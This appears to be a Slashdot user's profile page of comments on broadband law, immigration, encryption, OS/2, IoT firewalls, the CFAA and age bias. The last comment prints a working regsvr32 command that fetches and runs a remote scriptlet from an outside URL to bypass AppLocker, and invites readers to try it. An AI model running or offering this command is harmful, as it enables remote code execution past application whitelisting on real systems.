Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror

Comment Re:Did the communities actually build a network? (Score 1) 128

As someone who lives in a community in Colorado that just passed it's exemption I can tell you that SB 152 is highly unpopular. (Our SB 152 exemption passed by 84.5%.) For many small rural mountain towns, treating internet as a utility makes sense to people. It also allows towns to provide free wifi in public use areas such as shopping districts or parks.

What the article does not mention, is that DORA has already allotted $20 million in grants for community/government broadband in CO. But in order to qualify for any of it, communities must pass a SB 152 exemption. So regardless of how much cable companies spend to lobby, cities and counties are opting out because it is in their best interest to do so.

Comment Re:Your kids won't get jobs (Score 4, Insightful) 298

I have heard this argument so many times, but it is flawed. You are looking at jobs as if they are static fixed things like physical goods. That is simply not the case. Many immigrants move to a new country and START a business. Are they stealing your children's jobs too?

What happens to your 'they are stealing the jobs' argument in the next 50 years as the Earth's median population gets older and older? In 1950 the average age of a human being on earth was under 30. Right now the average age worldwide is around 33 years old. In the USA it is 38 years and that 5 year difference represents a vast population of aging baby-boomers born after WWII that require ever increasing care. (Well at least for the next 25 or 30 years) Demographically at some point you are going to have to choose whether you want your parents to be taken care of by immigrants or robots. There simply won't be enough working age 'americans' to do the work. In case you think I'm lying or making things up, just visit any assisted living facility anywhere in the US. It's already happening. There is and always will be a place in America for immigrants. If there were no jobs here for them they would not come here legally or otherwise. My grandparents came here from eastern europe fleeing tyrany, war and starvation in the early 20th century. Who am I to turn down someone coming here today for the exact same reason?! What kind of hypocrite would I be?

This kind of Nationalist, Populist, B.S. will be the death of us all. I for one want the Star Trek future promised to me by Gene Roddenberry and Bill Hicks. The one where we quit being greedy selfish beasts and become civilized. After all, it's just a ride

Comment Re:Full Disk Encryption & Backups & iscsi (Score 1) 262

Are you sure you are important enough as a person to warrant that much effort?

The victims 'importance' (or lack thereof) has little to do with data security. Once your device (PC/tablet/mobile/whatever) is lost or stolen, what happens next could just be for the Lulz...

Case in point. A friend of mine lost her mobile phone. It was found by nefarious folks who got into it and-

  • -changed all her social media passwords
  • - logged onto her email (without changing the passwords) and impersonated her to her contacts and family
  • - WRECKED her eBay account, which was her primary source of income
  • - eavesdrop and impersonated her on FB
  • - signed her up for identity protection (yes they did that)
  • - called and texted her repeatedly from different spoofed numbers just to harass her

They weren't stealing from her. It was all about harassment. But the takeaway is clear. The days where you could safely assume that thieves only want your hardware is gone and has been for some time. Thieves recognize that just like a wallet or safe, a cell phone or PC is a container and they want what is inside it.

Encrypt your data and keep backups, use strong passwords and never ever re-use passwords.

Submission + - Has the 40-year old mystery of the "Wow!" signal been solved? (newatlas.com)

schwit1 writes: Astronomers have confirmed that the Wow! signal, thought to be the most promising detection by SETI of alien life, was actually caused by a comet.

Last year, a group of researchers from the Center of Planetary Science proposed a new hypothesis that argued a comet might be the culprit. The frequency could be caused by the hydrogen cloud they carry, and the fact that they move accounts for why it seemingly disappeared. Two comets, named 266/P Christensen and P/2008 Y2 (Gibbs), happened to be transiting through that region of space when the Wow! signal was detected, but they weren’t discovered until after 2006.

To test the hypothesis, the team made 200 radio spectrum observations between November 2016 and February 2017. Sure enough, 266/P Christensen was found to emit radio waves at a frequency of 1,420 MHz, and to double check, the researchers moved their radio telescope by one degree. As expected, the signal vanished, and only returned when the telescope was trained back on the comet.


Comment For the Young... Some Background. (Score 4, Informative) 145

For anyone too young to remember, OS/2 Warp was an OS released by IBM to compete with Microsoft DOS in the late eighties. It was meant to be backward compatible and superior to DOS in just about every way(it really was too) . Because IBM had a better reputation for business/uptime/everything than Microsoft at the time OS/2 found wide usage in commercial & embedded devices (most notably ATMs). However, in the PC world, it didn't catch on. (Imagine having to install OS2 instead of DOS, then put windows on top of that. So unless your PC came with it you were probably SOL) So after a few years it was ONLY found in ATMs, where it continued to live all the way through the 1990s, eventually being replaced by XP.

OS/2 was pretty cool and I'd support this project if their pricing structure was geared to only charge for commercial use. They could have thousands of free beta testers. Charging hobby users will likely be their death knell... Just my 2 cents.

Submission + - Ask Slashdot: Smart firewalls for IoT

Ceaus writes: With the huge amount of challenges to protect our home networks from IoT cracking, I am thinking a smart firewall. It's a small box (the size of a RPi) with two ethernet ports which you put in front of your ISP router. This firewall is capable of detecting your IoT devices and block access to the internet, with only and exclusively allowing traffic for the associated mobile app (if there is one). All other outgoing IoT traffic is blocked (I don't want snooping eyes or internal botnet capability)
Once you've plugged in your new IoT toaster, you press the "Scan" button on the firewall and he does the rest for you.
Does such a firewall exist? Is this a possible Kickstarter project?
The idea is that this should be a cheap firewall targeted at home networks. I don't even know if this is a realistic project. I'd love to see some opinions on this.

Comment Great Name... Everyone is using it. (Score 2) 135

I'm all for companies open-sourcing cool algorithms. But not a great choice on the name. There are already several products out there called 'Lepton'. There's a software CMS, and also FLIR's thermal sensors are branded 'Lepton'. (Worth noting - Lepton IS an actual word so it probably won't qualify for Trademark protection. But an Apple Music vs. Apple Computer like scenario is not impossible to conceive.)

Submission + - ACLU Lawsuit Challenges Computer Fraud And Abuse Act

An anonymous reader writes: The American Civil Liberties Union (ACLU) has filed a lawsuit with the U.S. Department of Justice contending that the Computer Fraud and Abuse Act’s criminal prohibitions have created a barrier for those wishing to conduct research and anti-discrimination testing online.The ACLU have pursued the matter on behalf of a group of academic researchers, computer scientists and journalists seeking to remove that barrier to allow for third-party testing and research into potential online discrimination. In a public statement the ACLU contend "The CFAA violates the First Amendment because it limits everyone, including academics and journalists, from gathering the publicly available information necessary to understand and speak about online discrimination."

Comment Re:Peter Parker says (Score 1) 102

That page is tedious. The author provides no real description of his language other than to say it 'has a basic lexicon, syntax, and semantics' and 'is like the machine language of the universe. Any system you choose to analyze and model can be described in this language!' He asserts that his 'systemese' is based upon the way the human brain models systems. He reaches further at points to try to tie in the notion of sapience (read 'wisdom').

My instinct as a programmer tells me that once one actually tries to compile/interpret and run this 'systemese' the edge-cases take over and everything goes to hell

In order for it to work it would have to have a physics engine and extremely advanced.... Oh no! It can't be! It COULDN'T BE!

SI language demo - https://www.youtube.com/watch?...

Comment Did we all turn into luddites and fogeys? (Score 2) 103

"If your teens would prefer gaming indoors, alone, as opposed to going out to the movies, meeting friends for burgers or any of the other ways that teens build camaraderie, you may have a problem."

I'm sorry but this is the same bullsh** parents used to spout when I was a child-

Don't waste your time playing video games!
Go outside and get some sun!
Why don't you go play football or something?
you'll never if you just sit there on that computer all day.

Our parents meant well. But they didn't understand that games are the primary training tool for computer interfaces... They didn't see what was possible and thought we were all wasting our time. But now they know differently. Now they are all online and happy to receive pictures of their grandchildren and get to Skype/Facetime/etc with their families and friends. Now everyone wants their child into STEM and interest in football is waning because we've finally realized that repeatedly hitting our children in the head has consequences. At last, being a nerd is no longer a stigma.

If more than half of teens have this supposed 'problem' who is to say it's not the new normal? We ran up to them and handed them a baton and now we don't like which way they are running with it? If my generation had listened to our parent's the PC would have been a flash-in-the-pan fad and the world would look very different right now.

The real question for me is - What amazing things will this next generation do with the technology at their fingertips?

Submission + - Tech companies and age bias (observer.com)

OffTheLip writes: A recent editorial in the Observer by Dan Lyons highlights overt negative bias towards older tech workers including his personal journey as an aging worker. Information technology is young business in comparison to many other industries but one of the few where older workers are not valued for their institutional knowledge. It is accepted that current trends are for the young, the agile, workers with seemingly tireless work ethic and dedication. None of these traits are associated with older workers. Lyons draws comparisons to other successful workforce diversity efforts that seemingly don't apply to the tech world. He makes an argument for what the older worker brings to the team in experience and wisdom. As a recently retired techie I experienced this firsthand, both as a older worker, and earlier in my career one who didn't see the value in older workers. As Lyons states, older workers are good business.

Comment Re:Real issue is whitelist bypass (Score 1) 118

This isn't about gaining remote access to the system. This is about elevating access you already have.

Being able to use RegSrvr32.dll to bypass AppLocker provides arbitrary code execution without leaving any trace of it on the file system. Combine it with other vulnerabilities and you're cooking with gas!

Comment Re:Real issue is whitelist bypass (Score 4, Informative) 118

This exploit does not need admin rights. I just tried it. the request for admin rights only happens when a DLL is registered/unregistered. The flag /n prevents DLLRegisterServer from being used which defers the permission check.

The real trick here is that regsrvr32.dll will take a URL instead of a file as a script. No one had tried that before.

(Scared me enough I made a new firewall rule blocking outbound connections from regsrvr32.dll.)

Anyone who wants to try the proof-of-concept just open a command prompt and enter (from the article) -

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Slashdot Top Deals

HEAD CRASH!! FILES LOST!! Details at 11.

Working...